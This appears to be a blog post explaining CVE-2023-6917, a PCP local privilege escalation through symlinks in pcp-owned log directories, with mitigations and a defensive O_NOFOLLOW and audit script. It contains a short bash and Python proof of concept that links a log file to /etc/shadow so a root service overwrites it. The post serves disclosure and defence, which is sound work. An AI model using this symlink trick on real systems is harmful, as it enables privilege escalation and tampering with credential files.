CVE-2023-6917 - Local Privilege Escalation in Performance Co-Pilot (PCP) via Systemd Privilege Mismanagement
---
Introduction
In December 2023, a critical security vulnerability (CVE-2023-6917) was identified in the Performance Co-Pilot (PCP) package. This vulnerability impacts how systemd services are configured and how they interact with file permissions and user privileges. This post will break down what happened, how it works, and what you can do to protect your systems—all in plain, simple language.
What is PCP and Why Does This Matter?
Performance Co-Pilot (PCP) is a toolkit for monitoring and managing system performance on Linux and UNIX systems. In many environments, it runs automatically as part of the OS with privileged systemd services.
It is crucial that different services run under proper privilege levels. For example, low-privileged users and services shouldn't have the same power as root. Some of PCP's systemd services run as the unprivileged pcp user, while others run as the all-powerful root user. Unfortunately, the flaw in PCP allowed these two privilege levels to overlap in dangerous ways.
If a root service interacts with a directory or file owned by the less-privileged pcp user (especially where symlinks can be planted), the pcp user can escalate privileges by tricking root into following a malicious symlink, overwriting files as root, or accessing data normally restricted.
Find a Directory Owned by pcp
Some systemd root services write files or logs into a location owned by the pcp user, e.g., /var/log/pcp/{some-dir}.
Plant a Malicious Symlink
As the pcp user, an attacker creates a symlink in that directory that points to a sensitive root-owned file (like /etc/shadow).
```bash
# Run as user 'pcp'
ln -s /etc/shadow /var/log/pcp/someservice.log
```
Trigger the Vulnerable Root Service
Next time the root service writes to /var/log/pcp/someservice.log, it actually overwrites /etc/shadow (or whichever file is the link's target) — with attacker-controlled content or permissions!
Let's see a Python3 PoC:
```python
import os

# Attacker as 'pcp' user
os.symlink('/etc/shadow', '/var/log/pcp/exploit.log')
# Now, when the root PCP systemd service writes to /var/log/pcp/exploit.log,
# it will actually be overwriting /etc/shadow!
```
DANGER: Do NOT run this on your actual system — this is for educational illustration.
Patch Immediately:
If a patch is available from your distro or from pcp.io security advisories, apply it!
Review Systemd Service Files:
Make sure that your systemd PCP services all carry `User=pcp` and `Group=pcp` in their `[Service]` section where applicable, so they are dropped to the pcp user instead of running as root.
Lock Down Directories:
Ensure that directories writable by unprivileged users are NOT used by root processes. If root needs to write logs, use a root-only directory. Use chmod to prevent unnecessary write access.
```bash
# Make the PCP log directory root-owned and writable only by root
chown root:root /var/log/pcp
chmod 755 /var/log/pcp
```
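As an added example (not from the original post or the PCP project), here is the defensive counterpart of the PoC above: a root-side writer that opens its log with O_NOFOLLOW so a planted symlink is refused, plus an audit that lists symlinks under a log directory that resolve outside it. It runs unprivileged against a constructed temp-dir layout in which the names `shadow` and `pcp` stand in for /etc/shadow and /var/log/pcp.

```python
import errno
import os
import tempfile

def open_log_nofollow(path, mode=0o640):
    """Open/create a log for append without following a final-component symlink;
    raises OSError(ELOOP) if `path` is a symlink. O_NOFOLLOW does not check the
    directory components, so the directory itself must still be root-owned."""
    return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_APPEND | os.O_NOFOLLOW, mode)

def find_escaping_symlinks(log_dir):
    """Audit: (link, resolved_target) for every symlink below log_dir that resolves
    outside log_dir, i.e. a planted link a root writer could be tricked into."""
    base = os.path.realpath(log_dir)
    findings = []
    for dirpath, dirnames, filenames in os.walk(log_dir):
        for name in dirnames + filenames:
            link = os.path.join(dirpath, name)
            if os.path.islink(link):
                target = os.path.realpath(link)
                if os.path.commonpath([base, target]) != base:
                    findings.append((link, target))
    return findings

def demo():
    """Constructed layout in a temp dir (no root needed): 'shadow' stands in for
    /etc/shadow and 'pcp' for /var/log/pcp, with a planted link inside it."""
    tmp = tempfile.mkdtemp()
    sensitive = os.path.join(tmp, "shadow")
    log_dir = os.path.join(tmp, "pcp")
    os.mkdir(log_dir)
    with open(sensitive, "w") as f:
        f.write("root:*:0:0:99999:7:::\n")
    link = os.path.join(log_dir, "exploit.log")
    os.symlink(sensitive, link)
    # Vulnerable pattern: a plain open() follows the link and writes into the target.
    with open(link, "a") as f:
        f.write("root-service log line\n")
    with open(sensitive) as f:
        clobbered = "root-service log line" in f.read()
    # Hardened pattern: O_NOFOLLOW makes the kernel refuse the symlink with ELOOP.
    try:
        os.close(open_log_nofollow(link))
        blocked = False
    except OSError as e:
        blocked = e.errno == errno.ELOOP
    return {"clobbered_by_plain_open": clobbered,
            "blocked_by_nofollow": blocked,
            "escaping_links": find_escaping_symlinks(log_dir)}
```

`demo()` returns whether the plain write went through the link, whether the O_NOFOLLOW open was refused, and the audit's list of escaping links; the audit function can be pointed at a real log directory as-is.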
Official References
- CVE-2023-6917 at NVD
- Performance Co-Pilot Homepage
- PCP Security Advisories
- systemd Service Security
Conclusion
CVE-2023-6917 is a classic case of why privilege separation matters. When low-privilege and root-level processes collide in the same directory, the door is opened for dangerous escalations—all a local attacker needs is the pcp user, some clever symlinks, and a little patience.
Always make sure your services only have the permissions they absolutely need—and not a bit more.
Timeline
Published on: 02/28/2024 15:15:07 UTC
Last modified on: 02/29/2024 13:49:47 UTC